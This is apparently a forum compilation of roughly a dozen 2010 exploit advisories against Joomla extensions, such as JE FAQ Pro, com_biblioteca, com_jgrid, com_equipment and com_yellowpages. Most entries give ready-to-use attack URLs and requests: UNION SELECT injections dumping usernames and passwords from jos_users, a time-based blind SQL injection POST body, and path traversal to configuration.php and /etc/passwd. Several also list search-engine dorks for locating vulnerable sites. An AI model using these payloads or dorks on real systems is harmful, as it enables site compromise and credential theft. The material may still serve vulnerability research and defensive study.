Código: Seleccionar todo

---------------------------------------------------------------------------------
Joomla Component JE FAQ Pro : Multiple Remote Blind Sql Injection
---------------------------------------------------------------------------------
 
Author      : Chip D3 Bi0s
Group       : LatinHackTeam
Email & msn : chipdebios[at]gmail[dot]com
Date        : 2010-08-30
Critical Lvl    : Moderate
Impact      : Exposure of sensitive information
Where       : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : JE FAQ Pro
version     : 1.5.0
Price       : 1 year: 13.08$, 2 Year: 18.31$, 3 Year: 23.54$, 4 Year: 26.16$
Developer   : J Extension
License     : GPLv2 or later           type  : Commercial
Date Added  : 28 August 2010
Download    : http://www.jextn.com/joomla-faq-component-extensions-downloads/
Demo        : http://www.joomla-faq-demo.jextn.com/
 
Description     :
 
JE FAQ Pro is an easy to use but powerful and excellent FAQ management.
Our core competency from our front end and backend features will make you
to sit suitable because we take care of your needs in the FAQ Joomla component
needs. This is where we extending the suitability in Joomla.
 
 
 
Multiple Blind SQL Injection
 
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2[bsql]
 
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2[bsql]
 

Código: Seleccionar todo

# Author: Craw
# Email: [email protected]            
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
 
=======================================================
   
[+] ExploiT :
  
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
  
   
[+] Example :
  
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
  
   
=======================================================
Greetz @ LUXEMBOURG
=======================================================

Código: Seleccionar todo

============================================
Joomla!   (Multiple) ExploiT
 
============================================
 
#  Powered  Joomla! 1.5 & All version Down  (Multiple)
  
  
# Author: Mr.MLL
# Published: 2010-08-24
# Verified: yes
# Download Exploit Code
# Download N/A
  
===
  
  
# Software :  http://www.joomla.org/download.html
# Vendor   :  http://www.joomla.org/
# Contact  :  [email protected]
  
===
 
 
<?php
    }
 
    if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
    // checks for the presence of a return url
    // and ensures that this url is not the registration or login pages
        // If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $return );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) );
        }
    } else {
        // If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
        if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            mosRedirect( $mosConfig_live_site .'/index.php' );
        } else {
            mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) );
        }
    }
 
} else if ($option == 'logout') {
    $mainframe->logout();
 
    // JS Popup message
    if ( $message ) {
        ?>
 
=========
# ExploiT
  
    http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/
  
  
=========
 

Código: Seleccionar todo

view source
print?
---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (id) Remote Sql Injection
---------------------------------------------------------------------------------
 
Author      : Chip D3 Bi0s
Group       : LatinHackTeam
Email & msn : [email protected]
Date        : 23 August 2010
Critical Lvl    : Moderate
Impact      : Exposure of sensitive information
Where       : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : Zoom Portfolio --Joomla Portfolio Component
version     : 1.5
Price       : $20.00
Developer   : EGBZOOM
License     : GPLv2 or later           type  : Commercial
Date Added  : 21 August 2010
Download    : http://www.egbzoom.com/joomla-portfolio-component.html
 
Description     :
 
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort.The Component has features like add category
add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,
captioning, searching and more.It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presence. It is directed at artists of all walks of life, it is very easy to install
and customize, and it is just simply stunning.
 
-------------------------
 
How to exploit
 
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
 
-------------------------
 

Código: Seleccionar todo

view source
print?
Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities
 
 Name              Biblioteca
 Vendor            http://www.cielostellato.info
 Versions Affected 1.0 Beta
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-21
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
Component  that  allows  the automatic  management  of a
library  in  electronic format. It' can manage books and
their  loans  through   an   attractive  graphical  user
interface simple and usable.
 
 
II. DESCRIPTION
_______________
 
This component doesn't use the common Joomla's functions
to  get  the parameters's value from GET, POST etc.. and
all  of  these  are  not properly sanitised before being
used in SQL queries.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Multiple Blind SQL Injection
 B) Multiple SQL Injection
  
 
A) Multiple Blind SQL Injection
_______________________________
 
 
The  parameter  testo  passed  to  bi.php (site and admin
frontends)  is  properly sanitised before being used in a
SQL query.This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
 
 
B) Multiple SQL Injection
_________________________
 
The  parameter testo  passed  to  stampa.php, pdf.php and
models/biblioteca.php (when "view" is set to "biblioteca"
) is  properly sanitised before being used in SQL queries.
This  can  be  exploited to  manipulate  SQL  queries  by
injecting arbitrary SQL code.
 
 
IV. SAMPLE CODE
_______________
 
A) Multiple SQL Injection
 
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 
http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
 
 
V. FIX
______
 
No fix.

Código: Seleccionar todo

# Exploit Title: Joomla Component com_zina SQL Injection Vulnerability
# Date: 21-08-2010
# Author: Th3 RDX
# Software Link:http://www.pancake.org/zina/
# Version:  2.x
# Tested on: Demo Site
# category: webapp
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                   I Love Faith :)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky
(Indishell.in)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Big Hugs to >:D< : Br0wn Sug4r, Sid3^effects, L0rd CruSad3r, Sonic ,
r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
##############################################################################
%//
 
----- [ Founder ] -----
 
        Th3 RDX
 
----- [ E - mail ] -----
 
    [email protected]
 
 
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [Title] -----
 
Joomla Component com_zina SQL Injection Vulnerability
 
----- [ Vendor ] -----
 
http://www.pancake.org/zina/
                                                        %\\
##############################################################################
 
##############################################################################
%//
 
----- [ Injection (s) ] -----
 
----- [ SQL Injection ] -----
 
Put [BSQLi CODE]
 
[Link] http://joomla/index.php?option=com_zina&view=zina&Itemid=9[SQLi CODE]
 
 
 
                                                        %\\
##############################################################################
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN
 
=> c0d3 for motherland, h4ck for motherland
 
==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
 
Bug discovered : 21 August 2010
 
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
#End 0Day#

Código: Seleccionar todo

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
   Joomla Component com_extcalendar Blind SQL Injection Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# Date: 20/08/2010                                                       0
# Author : Lagripe-Dz                                                   1
# contact : [email protected]                                       8
# Home : Algeria                                                       1
# Category: webapps/0day                                               0
# Tested on: [ win xp sp2 ]                                               8
# Dork  allinurl:"com_extcalendar"                                       1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 
[+] Vulnerable File :
http://www.site.com/[PATH]/components/com_extcalendar/cal_popup.php?extmode=view&extid=[BLIND_SQL]
 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
                 Greetz 2 Allah and Ramadan Karim
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

Código: Seleccionar todo

===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================
   
Author :   _aL_Bayraqim_ 
   
Homepage : http://www.1923turk.com
  
BORDO BEREL?LER GRUP KOMUTANLIGI
 
..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mü cahit...!
   
===================================================
  [+]G00gle Dork :index.php?option=com_ongallery
   
[+] Vulnerable File :
   
   
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]
   
   
[+] ExploiT :
   
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
  
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
   
   
===================================================
?eHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen Le?Ler, SiZi Kim DiRiLTecek?..
=================================================== 

Código: Seleccionar todo

Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability
 
 Name              Jgrid
 Vendor            http://datagrids.clubsareus.org
 Versions Affected 1.0
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-14
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
DATA GRID Component built on the popular EXTJS Framework.
 
 
II. DESCRIPTION
_______________
 
A parameter is not properly sanitised before being  used
by the require_once function.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Local File Inclusion
  
 
A) Local File Inclusion
_______________________
 
The  controller  parameter in jgrid.php is not  sanitised
before  being  used by the PHP function's require_once().
This allows a guest to include local files. The following
is the affected code:
 
if($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
 
 
IV. SAMPLE CODE
_______________
 
A) Local File Inclusion
 
http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
 
 
V. FIX
______
 
No fix.

Código: Seleccionar todo

# Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability 
# Date : 16 - 8 - 2010 
# Author : Forza-Dz
# Vendor : http://joomlaequipment.com/
# Version : All Versions 
# Tested on : Win Sp2 and Mac
############################################################
Dork = inurl:"com_equipment"
############################################################
--- SQL Injection Vulenrability --- 
SQL Injection Vulenrability component "com_equipment"
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_equipment&view=details&id=[SQL]
or
http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[SQL]
############################################################
===[Injection]===
[SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[SQL] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users--
[SQL] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
############################################################
Greetz @ MCA-CRB All "DZ" "MusliM" 
############################################################
        ======[saha fotorkom]======
############################################################

Código: Seleccionar todo

Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities
 
 Name              Teams
 Vendor            http://www.joomlamo.com
 Versions Affected 1_1028_100809_1711
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-10
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
Teams is a base application for entering leagues, teams,
players, uniforms, and games. 
 
 
II. DESCRIPTION
_______________
 
Some parameters are not properly  sanitised before being
used in SQL queries.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Multiple Blind SQL Injection
  
 
A) Multiple Blind SQL Injection
_______________________________
 
Many parameters  are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
 
 
IV. SAMPLE CODE
_______________
 
A) Multiple Blind SQL Injection
 
POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
 
FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task=save&controller=player
 
 
V. FIX
______
 
No fix.

Código: Seleccionar todo

===============================================================
Joomla Component (com_yellowpages) SQL Injection Vulnerability
===============================================================
 
 
# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability
# Date : 9- 8 - 2010
 
# Author : _aL_bayraqim_
 
# BORDO BEREL?LER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
############################################################
Dork = inurl:/index.php?option=com_yellowpages
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_yellowpages"
http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################
#.Türk o?lu, !!..Türk k?z? !!..Türklügünü Koru!..
############################################################